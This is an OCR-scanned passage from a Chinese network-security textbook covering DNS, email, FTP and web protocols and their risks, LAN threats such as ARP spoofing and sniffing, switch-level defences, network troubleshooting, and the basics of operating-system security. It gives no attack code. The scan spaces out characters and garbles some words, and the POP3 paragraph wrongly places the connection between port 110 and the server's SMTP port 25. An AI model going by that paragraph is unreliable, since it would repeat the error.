实 了 。 一 方面 如 果 这 样 做 ,主机 列表 会 非常 大 ; 另 一 方面 , 当 其 他 机 器 改变 名 字 和 地 址 的 对 
应 关系 时 ,主机 列表 不 能 及 时 修改 。 采 用 了 DNS 域名 系统 后 ,由 一 些 服务 器 专门 提供 机 器 
的 名 字 和 IP 地 址 的 对 应 查询 服务 ,大 大 提高 了 查询 效率 。 

DNS 是 一 个 大 型 的 ,分 布 式 的 层次 化 的 域名 数据 库 , 这 种 层次 结构 是 一 个 倒 树 状 结构 ， 
最 上 面 是 树 根 , 结 点 都 是 根 的 子孙 。 根 结 点 下 的 每 个 域名 则 是 用 一 连 串 的 被 *. ”分 隔 的 结 点 
名 。 例 如 www. sina. com. cn 就 表示 顶级 域名 为 cn 下 的 商业 站 点 新 浪 网 的 WWW 服务 器 。 

3. 电子 邮件 系统 

在 TCP/IP 协议 簇 中 ,支持 Internet 电子 邮件 服务 的 基本 协议 是 简单 邮件 传输 协议 
(SMTP)。SMTP 支持 用 户 将 邮件 发 送 给 一 个 或 多 个 收 信 人 ,邮件 可 以 包括 文本 、 语 音 、 图 
形 或 视频 。SMTP 使 用 了 TCP 的 熟知 端口 25。 而 在 接收 邮件 时 , 则 采用 POP3 邮局 协议 ， 
其 中 客户 端 POP3 安装 在 接收 者 的 个 人 计算 机 上 ,服务 器 端 POP3 安装 在 邮件 服务 器 上 。 
当 客户 需要 从 邮件 服务 器 下 载 邮 件 时 ,客户 的 用 户 代 理 在 TCP 的 110 端口 与 服务 器 SMTP 
的 25 端口 之 间 建 立 连接 ,用 户 向 邮件 服务 器 发 送 用 户 名 ,口令 等 信息 , 待 验 证 通过 后 ,就 可 
以 列 出 邮件 清单 ,并 可 以 逐个 读 取 或 者 下 载 邮件 。 

针对 电子 邮件 系统 的 攻击 一 是 发 送 大 量 的 垃圾 邮件 ,消耗 邮件 服务 器 的 存储 空间 ; 二 
是 伪造 合法 的 邮件 发 送 者 ,在 其 中 隐藏 木马 或 病毒 , 待 用 户 打 开 阅 读 时 攻击 阅读 者 的 计算 机 
或 者 窃取 机 密 信息 ; 三 是 伪装 为 网 络 管理 员 ,发 送信 息 要 求 更 改 密码 或 口令 。 

4. 文件 传输 协议 

文件 传输 协议 (FTP) 是 为 进行 文件 共享 而 设计 的 因特网 标准 协议 。 

FTP 提供 交互 式 的 访问 ,人 允许 客户 指明 文件 的 类 型 与 格式 ,并 允许 文件 具有 存 取 权限 。 
由 于 FTP 屏蔽 了 各 计算 机 系统 的 细节 ,因而 适合 于 在 异 构 的 网 络 中 任意 计算 机 之 间 传 送 
文件 。 

FTP 客户 与 服务 器 的 一 次 文件 传输 需要 建立 控制 连接 和 数据 连接 两 个 独立 的 TCP 连 
接 , 控 制 连 接 必 须 在 整个 会 话 期 间 保持 活动 状态 。 建 立 控 制 连接 时 的 应 用 程序 进程 号 为 
21 ,而 进行 数据 传输 时 采用 的 端口 号 为 20。 由 于 FTP 使 用 了 两 个 不 同 的 端口 号 ,所 以 数据 
连接 与 控制 连接 不 会 发 生 混乱 。 

FTP 允许 使 用 匿名 登录 的 方式 访问 FTP 服务 器 ,在 这 种 方式 下 ,匿名 登录 的 用 户 可 以 
访问 部 分 共享 目录 ,甚至 可 以 上 传 文件 ,但 因此 也 存在 安全 隐患 ,一 些 非 法 用 户 会 登录 FTP 
服务 器 并 建立 隐藏 的 不 易 发 现 的 目录 并 上 传 非法 文件 。 

5. WWW 服务 

WWW 即 World Wide Web, 也 称 为 Web, 又 称 万 维 网 。 万维网 并 不 是 某 种 特殊 的 计算 
机 网 络 , 而 是 一 个 大 规模 的 、 联 机 式 的 信息 存储 所 。 万 维 网 用 链接 的 方法 能 非常 方便 地 从 因 
特 网 上 的 一 个 站 点 访问 另 一 个 站 点 ,从 而 主动 地 按 需 获取 丰富 的 信息 。 

万 维 网 是 一 个 分 布 式 的 超 媒体 系统 , 它 是 超 文本 系统 的 扩充 。 所 谓 超 文本 是 包含 指向 其 
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他 文档 的 链接 的 文本 。 也 就 是 说 ,一 个 超 文本 由 多 个 信息 源 链接 成 ,而 这 些 信 息 源 的 数目 实际 
上 是 不 受 限制 的 。 利 用 一 个 链接 可 使 用 户 找 到 另 一 个 文档 ,而 这 又 可 链接 到 其 他 的 文档 。 这 
些 文档 可 以 位 于 世界 上 任何 一 个 连接 在 因特网 上 的 超 文 本 系统 中 。 超 文本 是 万 维 网 的 基础 。 

超 媒 体 与 超 文 本 的 区 别 是 文档 内 容 不 同 。 超 文本 文档 仅 包含 文本 信息 ,而 超 媒 体 文档 
还 包含 其 他 表示 方式 的 信息 ,如 图 形 、 图 像 、 声 音 、 动 画 和 活动 视频 图 像 。 

为 了 定位 在 因特网 上 的 一 个 万 维 网 文档 ,万 维 网 使 用 了 统一 资源 定位 符 URL 来 标识 
万 维 网 上 的 各 种 文档 ,并 使 每 一 个 文档 在 整个 因特网 的 范围 内 具有 唯一 的 标识 符 URL。 

为 了 访问 万 维 网 上 的 各 种 链接 ,万 维 网 采用 了 超 文 本 传送 协议 HTTP 来 传送 各 种 文 
档 。HTTP 是 一 个 应 用 层 协议 , 它 使 用 TCP 连接 进行 可 靠 的 传送 。 

为 了 使 得 不 同 作者 创作 的 不 同 风格 的 万 维 网 文档 都 能 在 因特网 上 的 各 种 主机 上 显示 出 
来 ,万 维 网 使 用 了 超 文本 标记 语言 HTML ,使 得 万 维 网 页 面 的 设计 者 可 以 很 方便 地 将 自己 
设计 的 风格 独特 的 网 页 在 客户 端的 浏览 器 上 显示 出 来 。 

URL 的 一 般 形式 由 以 下 4 个 部 分 组 成 : 


< 协议 >: //< 主 机 >:< 端 口 >/< 路 径 > 
例如 ,清华 大 学 的 主页 的 URL 为 : 
http://www. tsinghua. edu. cn 


这 里 省 略 了 默认 的 端口 号 80。 从 清华 大 学 的 主页 进入 后 ,可 以 通过 不 同 的 链接 查找 到 
各 个 部 门 的 有 关 信 息 , 其 路 径 的 表示 也 会 变化 ,例如 : 


http://www. tsinghua. edu. cn/qhdwzy/gljg. jsp 


是 清华 大 学 管理 机 构 页 面 的 URL 地址 ,该 页 面 存储 在 清华 大 学 WWW 服务 器 的 /qhdwzy/ 
目录 下 ,页 面 文件 名 为 gljg. jsp。 

在 万 维 网 中 用 来 进行 搜索 的 工具 叫做 搜索 引擎 。 搜 索引 擎 的 种 类 很 多 ,但 大 体 上 分 为 
两 类 , 即 全 文 检索 搜索 引擎 和 分 类 目录 搜索 引擎 。 

从 用 户 的 角度 看 ,使 用 这 两 种 不 同 的 搜索 引擎 都 能 够 实现 自己 查询 信息 的 目的 ,但 用 户 
得 到 的 信息 的 形式 并 不 一 样 。 全 文 检索 搜索 引擎 往往 可 以 直接 检索 到 相关 内 容 的 网 页 ,但 
分 类 目录 搜索 引擎 一 般 只 能 检索 到 相关 信息 的 网 址 。 为 了 使 用 户 能 够 更 加 方便 地 搜索 到 有 
用 信息 ,目前 许多 网 站 往往 同时 具备 全 文 检索 搜索 和 分 类 目录 搜索 的 功能 。 

新 出 现 的 一 些 搜索 引擎 有 垂直 搜索 引擎 和 元 搜索 引擎 。 垂 直 搜 索引 擎 针对 某 一 特定 领 
域 . 特 定 人 群 或 某 一 特定 需求 提供 搜索 服务 。 元 搜索 引擎 将 用 户 提交 的 检索 请 求 发 送 到 多 
个 独立 的 搜索 引擎 上 去 搜索 ,并 把 检索 结果 集中 统一 处 理 , 以 统一 的 格式 提供 给 用 户 , 因 此 ， 
是 搜索 引擎 之 上 的 搜索 引擎 。 它 主要 侧重 于 提高 搜索 速度 、 智 能 化 处 理 搜索 结果 个 性 化 搜 
索 功 能 的 设置 和 用 户 检索 界面 的 友好 性 上 ,其 查 全 率 和 查 准 率 都 比较 高 。 

WWW 服务 中 采用 的 Web 浏览 器 和 WWW 服务 器 都 存在 安全 隐患 ,表现 在 以 下 几 个 
方面 。 

(1) Web 浏览 器 依赖 于 (或 者 会 调用 ) 外 部 程序 ,通常 称 为 “查看 程序 (放映 程序 )”( 包 括 
plug-in 和 ActiveX) ,用 它 来 处 理 浏览 器 不 能 识别 的 数据 类 型 ,由 于 查看 程序 属于 第 三 方 软 
件 , 因 此 难以 确保 其 安全 性 。 
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(2) HTML 文档 很 容易 与 其 他 服务 器 上 的 文档 进行 链接 ,所 以 人 们 很 难 弄 清楚 某 个 文 
档 是 属于 谁 . 是 否 真实 可 信 。 

(3) 用 户 浏览 的 页 面 上 会 挂 有 “木马 ”等 恶意 代码 程序 , 当 用 户 点 击 页 面 上 的 这 些 内 容 
时 ,容易 将 恶意 代码 下 载 到 本 机 ,使 本 机 很 容易 成 为 黑客 攻击 的 对 象 。 

(4) 攻击 者 会 引诱 浏览 者 通过 页 面 的 链接 去 浏览 仿冒 的 合法 网 站 , 即 网 络 钓鱼 ,由 于 浏 
览 者 不 太 注 意 浏览 器 中 的 URL 地 址 ,而 是 仅 通过 页 面 的 相似 程度 判断 是 否 是 合法 网 站 ,所 
以 钓鱼 网 站 极 易 骗取 用 户 的 信任 ,并 窃取 用 户 的 机 密 信 息 。 

(5) WWW 服务 器 中 的 相应 服务 和 Web 浏览 器 都 存在 许多 漏洞 ,这 些 漏 洞 容易 成 为 黑 
客 攻击 进入 的 通道 。 例 如 在 IIS 4.0 和 IIS 5.0 的 Unicode 字符 解码 的 实现 中 存在 一 个 安全 
漏洞 ,导致 用 户 可 以 远程 通过 IIS 执行 任意 命令 。 当 IIS 打开 文件 时 ,如 果 该 文件 名 包含 
Unicode 字符 , 它 会 对 其 进行 解码 ,如 果 用 户 提供 一 些 特 殊 的 编码 ,将 导致 IIS 错误 地 打开 或 
者 执行 某 些 Web 根 目录 以 外 的 文件 。 


2.4 ”局域网 安全 的 基本 措施 与 方法 


2.4.1 局 域 网 的 安全 威胁 


局 域 网 是 一 个 物理 连接 范围 较 小 的 网 络 ,通常 采用 交换 机 、 集 线 器 等 设备 进行 网 络 的 
连接 。 

局 域 网 在 未 划分 VLAN 的 情况 下 ,是 一 个 广播 域 ,任何 一 个 站 点 发 出 的 信息 都 可 以 被 设 
置 为 混杂 模式 的 其 他 站 点 侦 听 到 ,因此 ,局 域 网 的 安全 问题 是 网 络 管理 员 必 须 重视 的 问题 。 

局 域 网 面临 的 安全 威胁 主要 包括 以 下 几 方 面 。 

(1) 网 络 数据 包 的 嗅 探 。 由 于 在 局 域 网 中 任何 一 个 计算 机 只 要 将 网 卡 设置 为 混杂 模 
式 , 都 可 以 侦 听 到 其 他 计算 机 发 出 的 信息 ,特别 是 许多 信息 采用 明文 方式 传输 ,因此 ,攻击 者 
只 要 通过 物理 方式 连 入 局 域 网 , 极 易 获取 网 络 中 的 用 户 名 和 口令 ,进而 以 合法 身份 访问 网 络 
资源 ,窃取 网 络 信息 。 

(2) IP 地 址 伪造 。 攻 击 者 会 伪造 成 局 域 网 内 的 合法 IP 地 址 ,来 访问 和 窃取 局 域 网 内 的 
信息 , 盗 取 资 源 。 

(3) ARP 攻击 。ARP 攻击 其 实 就 是 内 网 某 台 主机 伪装 成 网 关 , 欺 骗 内 网 其 他 主机 的 信 
任 ,将 所 有 发 往 网 关 的 信息 发 到 这 台 主 机 上 。 由 于 此 台 主 机 的 数据 处 理 转 发 能 力 远 远 低 于 
网 关 , 因 此 导致 大 量 信息 堵塞 ,网 速 越 来 越 慢 , 其 至 造成 网 络 瘫 痰 。 通 过 这 种 方式 ,可 以 截取 
用 户 的 信息 , 盗 取 用 户 的 网 络 游 戏 账号 .QQ 密码 等 ,也 会 造成 局 域 网 堵塞 ,甚至 威胁 到 局 域 
网 用 户 的 信息 安全 。 

(4) SYN 攻击 。 由 于 攻击 者 可 以 利用 嗅 探 技术 截获 局 域 网 内 的 传输 报 文 , 因 此 可 以 分 
析 报 文 信息 ,猜测 到 TCP 报 文 的 序列 号 ,进而 再 截获 合法 连接 ,冒充 合法 用 户 ,与 被 连接 者 
进行 通信 ,获取 各 种 机 密 信息 。 


2.4.2 局 域 网 的 安全 防范 
由 于 局 域 网 是 一 个 内 部 网 络 ,因此 防火 墙 无 法 防止 各 种 内 部 的 攻击 ,通常 需要 通过 对 交 
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换 机 、 服 务 器 进行 设置 来 提高 局 域 网 的 安全 性 。 

对 局 域 网 的 交换 机 来 说 ,首先 需要 判断 并 封 堵 一 些 常见 病毒 所 使 用 的 端口 ,以 及 进行 端 
口 速率 限制 。 而 为 了 能 够 识别 各 种 恶意 数据 流量 ,交换 机 上 就 必须 使 用 一 款 智能 芯片 ,使 其 
具备 一 定 的 分 析 处 理 能 力 ,可 以 准确 地 判断 、 封 堵 、 限 制 并 记录 ARP 攻击 和 DDoS 攻击 事 
件 , 切 断 病毒 传播 的 路 径 。 具 有 安全 性 的 交换 机 ,通常 应 当 具 有 以 下 特点 。 

(1) 支持 基于 IP、MAC 应 用 的 访问 控制 列表 功能 (ACL)。 

(2) 支持 常见 病毒 端口 过 滤 功 能 。 

(3) 支持 基于 端口 JP.MAC \ 应 用 的 速率 限制 。 

(4) 支持 基于 端口 .IP、MAC、802. 1p 和 应 用 的 优先 级 控制 (QoS) 。 

(5) 支持 基于 MAC+IP+VLAN 十 端口 的 绑 定 (ARP 防御 ) 。 

(6) 支持 ARP 攻击 和 DDoS 攻击 事件 记录 日 志 。 

对 网 络 中 的 服务 器 来 说 ,必须 设置 具有 安全 性 的 域 认证 策略 ,加强 各 种 安全 认证 ,减少 
共享 目录 ,并 定期 对 安全 日 志 进 行 审 计 和 检查 。 


2.5 网 络 故障 的 分 析 与 排除 技术 


2.5.1 网 络 故障 分 析 技 术 


网 络 故障 是 网 络 运行 中 非常 常见 的 现象 ,选用 合适 的 技术 ,采用 恰当 的 手段 ,可 以 快速 
诊断 网 络 故障 所 在 ,恢复 网 络 正常 运行 。 

网 络 的 故障 诊断 既是 一 门 技术 ,也 是 一 门 艺术 。 网 络 的 故障 诊断 就 是 通过 测试 、 分 析 、 
判断 等 手段 ,准确 定位 网 络 中 的 故障 种 类 和 性 质 。 

网 络 故障 的 诊断 步骤 通常 如 下 。 

(1) 准确 查 出 问题 。 问 题 是 什么 时 候 发 生 的 ,采取 了 什么 行动 ? 发 生 问题 时 ,正在 进行 
新 的 工作 还 是 常规 的 工作 ? 最 近 进 行 过 哪些 可 能 造成 故障 的 改变 ? 重建 问题 容易 吗 ? 

(2) 重建 问题 。 如 果 可 能 ,重建 发 生 的 问题 ,如 重建 连接 等 。 生 成 一 个 可 能 发 生 故障 问 
题 的 列表 ,并 随 着 问题 缩小 慢 慢 缩小 列表 。 

(3) 分 离 原因 。 分 离 设备 ,协议 、 连 接 、 应 用 等 各 种 原因 ,也 即 通 常 的 排除 法 。 

(4) 拟订 并 实施 改正 方案 ,拟订 几 种 方案 ,经 过 选择 ,确定 一 种 折 中 方案 。 

(5) 测试 解决 方案 。 保 证 拟订 方案 的 正确 性 和 不 会 引起 其 他 的 连锁 问题 ,保证 系统 的 
其 他 部 分 不 会 受到 采取 的 措施 的 影响 。 

(6) 记录 问题 和 解决 方案 ,并 获取 反馈 。 必 须 像 设计 一 个 网 络 和 安装 一 个 网 络 一 样 认 
真 记录 解决 过 程 ,并 从 受到 影响 的 用 户 处 得 到 反馈 ,完成 故障 诊断 过 程 的 循环 。 

故障 的 排除 方法 通常 有 两 种 ,流程 图 法 和 因果 关系 法 。 

流程 图 是 流 经 一 个 系统 的 信息 流 、 观 点 流 或 部 件 流 的 图 形 表示 。 在 网 络 故障 诊断 中 , 流 
程 图 主要 用 来 罗列 一 个 故障 可 能 存在 的 各 种 原因 及 其 处 理 步 又。 流程 图 是 揭示 和 掌握 封闭 
系统 运动 状况 的 有 效 方式 。 作 为 网 络 故 障 诊断 方法 , 它 能 够 判断 一 旦 网 络 出 现 故障 以 后 , 问 
题 可 能 出 在 什么 地 方 , 从 而 确定 出 可 供 选 择 的 故障 解决 方案 。 

图 2-12 是 用 流程 图 法 排除 两 个 站 点 无 法 连通 故障 的 示意 图 。 
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图 2-12 用 流程 图 法 排除 两 个 站 点 无 法 连通 故障 的 示意 图 


因果 分 析 法 是 通过 因果 图 来 分 析 问 题 和 解决 问题 的 一 种 方法 。 因 果 图 又 称 特性 要 因 
图 、 鱼 刺 图 或 石川 图 , 它 是 1953 年 在 日 本 川 琦 制 铁 公司 ,由 质量 管理 专家 石川 殴 最 早 使 用 
的 ,是 为 了 寻找 产生 某 种 质量 问题 的 原因 ,发 动 大 家 谈 看 法 ,做 分 析 , 将 群众 的 意见 反映 在 一 
张 图 上 ,就 是 因果 图 。 用 此 图 分 析 产 生 问题 的 原因 ,便于 集思广益 。 因 为 这 种 图 反映 的 因果 
关系 直观 ,醒目 ,条例 分 明 , 用 起 来 比较 方便 ,效果 好 ,在 很 多 方面 得 到 了 广泛 的 应 用 。 

因果 分 析 法 (技术 ) 运 用 于 网 络 故障 诊断 中 ,就 是 以 结果 作为 特性 ,以 原因 作为 因素 , 逐 
步 深入 研究 和 讨论 某 种 网 络 故障 可 能 造成 的 诱因 ,然后 逐个 排除 ,最 后 找 出 出 现 网 络 故障 的 
真正 原因 。 因 果 分 析 法 的 可 交付 成 果 就 是 因果 分 析 图 。 

图 2-13 是 用 因果 图 法 排除 网 络 组 件 失效 故障 的 示意 图 。 


由 备份 引起 的 难以 觉察 的 配置 变动 IP 地 址 、 子 网 掩 码 、 默 认 网 关 有 误 
端口 速率 不 正确 
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图 2-13 用 因果 图 法 排除 网 络 组 件 失效 故障 的 示意 图 
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2.5.2 网 络 故障 排除 工具 


网 络 故障 排除 工具 包括 命令 类 工具 、 硬 件 类 工具 和 软件 类 工具 。 

1. 命令 类 工具 

命令 类 工具 包括 : IPCFG ,Ping,Tracert,nbstat,netstat,ARP 等 ,例如 Ipconfig 命令 可 
以 显示 TCP/IP 网 络 的 当前 配置 值 ,包括 主机 名 称 、 域 名 系统 、 服 务 器 名 称 和 其 他 相关 信息 。 
该 命令 可 以 在 DOS 命令 下 或 Windows 命令 下 使 用 。 

例如 在 DOS 下 ,通常 的 命令 格式 为 : 

Ipconfig 显示 信息 。 

Ipconfig /all 显示 详细 (所 有 ) 信 息 。 

Ipconfig /renew 重启 所 有 的 适配器 。 

Ipconfig /release * Conx* 释放 所 有 连接 。 

2. 硬件 类 工具 


硬件 工具 有 LAN 协议 分 析 仪 . WAN 协议 分 析 仪 .接口 测试 仪 .逻辑 分 析 仪 、 线 缆 测 试 
仪 .OTDR ,频谱 分 析 仪 示波器、 万 用 表 和 网 络 万 用 表 等 ,比较 常用 的 如 Fluke 公司 的 网 络 
故障 一 点 通 , 其 具有 以 下 功能 。 

(1) 查找 交换 机 ,定位 可 用 接口 ,活动 端口 MAC、IP、SNMP 名 称 和 链 路 速度 。 

(2) 查看 数据 ,指出 冲突 的 IP 地 址 、 网 络 配置 不 匹配 以 及 物理 错误 。 

(3) 关键 网 络 统计 ,查看 以 太 网 利用 率 、 冲 突 和 错误 。 

(4) 电缆 测试 ,包括 识别 长 度 . 开 路 、 跨 接 和 串 绕 线 对 。 

(5) 可 以 测试 跨越 骨干 网 的 IP 吞吐 量 , 测 试 WAN 的 IP 性 能 。 在 安装 VPN 时 可 以 进 
行 基准 拥塞 测试 ,确定 xDSL 链 路 的 最 佳 性 能 。 

3. 软件 类 工具 

软件 工具 包括 各 种 协议 分 析 软 件 .端口 测试 软件 、 链 路 测试 软件 网络 管 理 软件 和 网 络 
性 能 在 线 监 测 软件 等 。 我 国 也 开发 了 相关 的 网 络 测试 管理 软件 ,如 科 来 网 络 分 析 系 统 , 可 以 
对 网 络 传输 的 底层 数据 进行 采集 和 分 析 , 对 网 络 性 能 、 网 络 安全 性 等 进行 评估 和 分 析 , 还 可 
以 分 析 判 断 诸 如 网 络 丢 包 严重 、 网 速 慢 、 网 络 攻击 等 故障 。 


2.5.3 两 种 典型 的 LAN 故障 的 排除 方法 


LAN 在 使 用 中 易 出 现 各 式 各 样 的 故障 ,不 但 造成 使 用 中 的 问题 ,也 会 大 大 影响 网 络 的 
安全 。 但 严格 说 来 ,LAN 故障 排除 只 要 按照 相关 的 方法 进行 ,就 可 以 排除 。 另 外 ,规范 的 网 
络 管理 ,是 减少 网 络 故障 的 重要 手段 ; 完善 的 技术 档案 ,是 排除 故障 的 重要 参考 ; 而 有 效 的 
测试 和 监视 工具 则 是 排除 故障 的 有 力 助手 。 

下 面 介 绍 两 种 常见 的 LAN 故障 排除 与 解决 办 法 。 

1. 与 网 络 邻 居 有 关 的 几 种 故障 

(1) 在 网 络 邻 居中 看 不 到 任何 计算 机 。 

可 能 的 原因 是 : 本 机 网 络 配 置 不 当 , 最 大 的 可 能 是 网 卡 的 驱动 程序 工作 不 正常 。 此 时 
应 检查 网 卡 的 驱动 程序 ,必要 时 重新 安装 驱动 程序 。 
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(2) 在 网 上 邻居 或 资源 管理 器 中 只 能 看 到 本 机 。 

一 般 只 要 能 看 到 本 机 ,就 至 少 说 明 本 机 的 网 卡 已 正确 安装 ,这 种 网 络 通信 错误 多 是 由 网 
线 断 路 或 者 与 网 卡 的 连接 不 良 造成 ,还 有 可 能 是 Hub 或 交换 机 的 问题 。 

(3) 网 上 邻居 中 找 不 到 域 及 服务 器 ,但 可 以 找到 其 他 的 工作 站 。 

多 是 由 于 未 顺利 登录 Windows 网 络 造成 。 排 除 方法 是 : 在 “控制 面板 ”一 网络? 一 
“Microsoft 网 络 客户 ”中 ,将 登录 时 Windows 与 网 络 的 连接 由 慢 速 改 为 快速 连接 。 

(4) 在 查看 网 上 邻居 时 ,会 出 现 * 无 法 浏览 网 络 /网 络 不 可 访问 /想得到 更 多 信息 ,请 查 
看 “帮助 索引 ?中 的 “网 络 疑难 解答 "专题 "的 错误 提示 。 

首先 ,检查 网 卡 是 否 正常 工作 ,是 否 与 其 他 的 硬件 冲突 。 打 开 * 控 制 面板 ”系统 ”一 
“设备 管理 ,查看 硬件 的 前 面 是 否 有 黄色 的 问号 .感叹 号 或 者 红色 的 问号 。 如 果 有 ,必须 手 
工 更 改 这 些 设备 的 中 断 和 1/O 地 址 设置 。 

其 次 ,可 以 检查 Windows 网 络 是 否 登 录 。 如 果 在 Windows 启动 后 ,要 求 输入 Microsoft 网 
络 用 户 登录 口令 时 , 单 击 “ 取 消 ” 按 钮 则 会 出 现 类 似 症状 。 要 登录 域 服 务 器 ,必须 以 合法 的 用 
户 登 录 , 并 且 输 入 正确 口令 。 

(5) 可 以 访问 服务 器 或 Internet, 但 网 上 邻居 中 却 看 不 到 其 他 工作 站 。 

首先 确定 是 否 使 用 了 WINS 解析 ,若是 , 则 可 能 是 WINS 服务 器 地 址 设置 不 当 。 

其 次 ,检查 网 关 设置 , 若 双方 分 属 不 同 的 子 网 而 网 关 设 置 有 误 , 则 不 能 看 到 其 他 工作 站 。 

最 后 ,还 可 能 是 子 网 掩 码 配置 故障 ,此 时 须 检 查 子 网 掩 码 设置 。 

2. 网 卡 相关 故障 

(1) 网 卡 无 法 安装 。 

这 多 是 由 于 PC 上 安装 了 过 多 其 他 类 型 的 接口 卡 ,造成 中 断 和 IVO 地 址 被 占用 或 冲突 。 
解决 方法 是 可 以 先 将 其 他 的 各 种 插 卡 印 除 , 先 正确 安装 网 卡 ,然后 再 依次 安装 其 他 搬 卡 , 若 
安装 了 某 个 插 卡 后 出 现 冲 突 ,说 明 是 该 卡 与 网 卡 有 冲突 ,此 时 应 改变 该 卡 的 中 断 号 或 地 址 ， 
然后 再 安装 其 他 接口 卡 。 

如 果 PC 中 有 一 些 安装 不 正确 的 设备 ,或 有 “未 知 设备 ”一 项 ,使 系统 不 能 检测 网 卡 。 这 
时 应 该 删除 “未 知 设备 ”中 的 所 有 项 目 ,然后 刷新 或 者 重新 启动 计算 机 。 

另 一 种 可 能 是 PC 不 能 识别 这 一 种 类 型 的 网 卡 ,其 原因 是 多 方面 的 ,比如 主板 的 兼容 性 
等 。 这 种 情况 多 通过 更 换 网 卡 来 解决 。 

(2) 在 安装 网 卡 后 在 “控制 面板 ”>“ 系 统 ”>“ 设 备 管理 器 ”中 将 报告 “可 能 没有 该 设备 ， 
也 可 能 此 设备 未 正常 运行 ,或 是 没有 安装 此 设备 的 所 有 驱动 程序 ”。 

可 通过 如 下 步 又 检查 。 

首先 可 能 是 没有 安装 正确 的 驱动 程序 ,或 者 驱动 程序 版 本 不 对 。 

其 次 可 能 是 中 断 号 与 1/O 地 址 没有 设置 好 。 有 一 些 网 卡通 过 跳 线 开关 设置 ,另外 有 些 
网 卡 则 是 通过 随 卡 带 的 Setup 程序 进行 设置 。 

(3) 安装 网 卡 系统 启动 变 得 很 慢 。 

多 是 由 于 在 TCP/IP 设置 中 设置 了 “自动 获取 IP 地 址 ,这 样 每 次 启动 计算 机 时 ,计算 
机 都 会 主动 搜索 当前 网 络 中 的 DHCP 服务 器 ,而 如 果 网 络 中 没有 DHCP 服务 器 , 则 计算 机 
启动 的 速度 会 大 大 降低 。 

一 般 可 通过 禁用 DHCP ,为 网 卡 指定 IP 地 址 的 方式 解决 。 
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本 章 学 习 要 求 ， 

。 了 解 各 种 Windows 系统 和 Linux 系统 的 安全 机 制 。 
。 掌握 如 何 安装 与 配置 VMware 虚拟 机 。 

。 了 解 网 络 协议 分 析 器 的 工作 原理 。 

。 掌握 Sniffer Pro 网 络 协议 分 析 器 的 使 用 方法 。 

。 了 解 网 络 安全 编程 的 相关 知识 。 

。 掌握 基本 的 网 络 安全 编程 方法 。 


3.1 操作 系统 安全 


3.1.1 操作 系统 安全 概述 


操作 系统 是 计算 机 资源 的 直接 管理 者 ,是 连接 计算 机 硬件 与 上 层 软 件 及 用 户 的 桥梁 ,是 
计算 机 软件 的 基础 和 核心 ,是 计算 机 系统 安全 的 基础 , 它 的 安全 性 至 关 重要 。 计 算 机 操作 系 
统 的 安全 主要 是 利用 安全 手段 防止 操作 系统 本 身 被 破坏 ,防止 非法 用 户 对 计算 机 资源 (如 计 
算 机 硬件 .系统 应 用 软件 ,系统 数据 ,系统 控制 等 资源 ) 的 窍 取 。 

操作 系统 的 安全 机 制 包 括 硬件 安全 机 制 、 操 作 系统 的 安全 标识 和 鉴别 .访问 控制 .最 小 
特权 管理 和 可 信 通 路 等 。 

1. 硬件 安全 机 制 

安全 操作 系统 的 硬件 安全 机 制 ,实质 上 也 是 普通 操作 系统 所 要 求 的 ,计算 机 硬件 安全 的 
目标 是 保证 自身 的 可 靠 性 和 为 系统 提供 基本 安全 机 制 。 优 秀 的 硬件 保护 性 能 是 高 效 、 可 靠 
的 操作 系统 的 基础 。 硬 件 安全 机 制 通常 包括 存储 保护 .运行 保护 .IVO 保护 等 。 

存储 保护 是 一 个 安全 操作 系统 最 基本 的 要 求 , 主 要 是 保护 用 户 在 存储 器 中 的 数据 不 受 
破坏 。 安 全 操作 系统 最 重要 的 一 点 是 实行 分 层 设计 ,而 运行 域 正 是 这 样 一 种 基于 保护 环 的 
等 级 式 结构 。 运 行 保护 是 指 进程 严 格 按照 运行 域 机 制 运行 。1/O 保护 是 操作 系统 功能 中 最 
复杂 的 一 个 功能 ,要 寻找 一 个 操作 系统 安全 方面 的 缺陷 ,往往 是 从 系统 的 1/O 部 分 开始 。 
一 个 安全 的 系统 是 把 IO 赋予 一 个 特权 指令 。 用 户 程序 要 想 启 动 1O, 必 须 请 求 操作 系统 
代为 启动 。 

2. 操作 系统 的 安全 标识 和 鉴别 

用 户 标识 鉴别 是 操作 系统 提供 的 最 外 层 保护 措施 。 标 识 就 是 系统 对 每 一 个 用 户 的 身份 
都 有 一 个 特定 的 系统 内 部 可 以 标识 的 标记 ,这 个 标记 就 是 用 户 标识 符 。 这 个 标识 在 全 系统 
中 是 唯一 的 。 将 用 户 标识 符 与 用 户 联系 起 来 的 过 程 就 是 鉴别 。 
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3. 访问 控制 

操作 系统 的 访问 控制 涉及 自主 访问 控制 和 强制 访问 控制 两 个 形式 。 自 主 访问 控制 是 基 
于 对 主体 或 主体 所 属 的 主体 组 的 识别 ,限制 对 客体 的 访问 。 自 主 访问 控制 技术 有 一 个 最 主 
要 的 缺点 ,就 是 不 能 有 效 地 抵抗 计算 机 病毒 的 攻击 。 强 制 访 问 控制 是 “强加 ?给 访问 主体 的 ， 
即 系统 强制 主体 服从 访问 控制 策略 。 其 主要 特征 是 对 所 有 主体 及 其 所 控制 的 客体 (如 : 进 
程 . 文 件 . 段 .设备 ) 实 施 强制 访问 控制 。 

4. 最 小 特权 管理 

所 谓 最 小 特权 , 指 的 是 “在 完成 某 种 操作 时 所 赋予 网 络 中 每 个 主体 (用 户 或 进程 ) 必 不 可 
少 的 特权 ”。 最 小 特权 原则 则 是 指 “应 限定 网 络 中 每 个 主体 所 必需 的 最 小 特权 ,确保 可 能 的 
事故 、 错 误 、 网 络 部 件 的 算 改 等 原因 造成 的 损失 最 小 ”"。 最 小 特权 原则 在 安全 操作 系统 中 占 
据 了 非常 重要 的 地 位 。 角 色 管理 机 制 是 依据 "最 小 特权 ”原则 对 系统 管理 员 的 特权 进行 的 分 
化 ,每 个 用 户 只 能 拥有 刚 够 完成 工作 的 最 小 权限 。 

5. 可 信和 通路 

可 信 通 路 也 是 路 径 , 是 终端 人 员 借 以 直接 同 可 信 计 算 机 通信 的 一 种 机 制 ,该 机 制 只 能 由 
有 关 终 端 人 员 或 可 信 计 算 机 启动 ,并且 不 能 被 不 可 信和 软件 所 模仿 。 在 用 户 执行 一 些 操作 时 ， 
用 户 必 须 确 定 是 与 安全 核心 通信 而 不 是 与 一 个 特洛伊 木马 在 交换 信息 。 同 时 用 户 在 进行 特 
权 操 作 时 ,也 要 有 办 法 证 实 这 是 从 内 核 输送 出 来 的 正确 信息 ,不 是 来 自 特洛伊 木马 的 模拟 信 
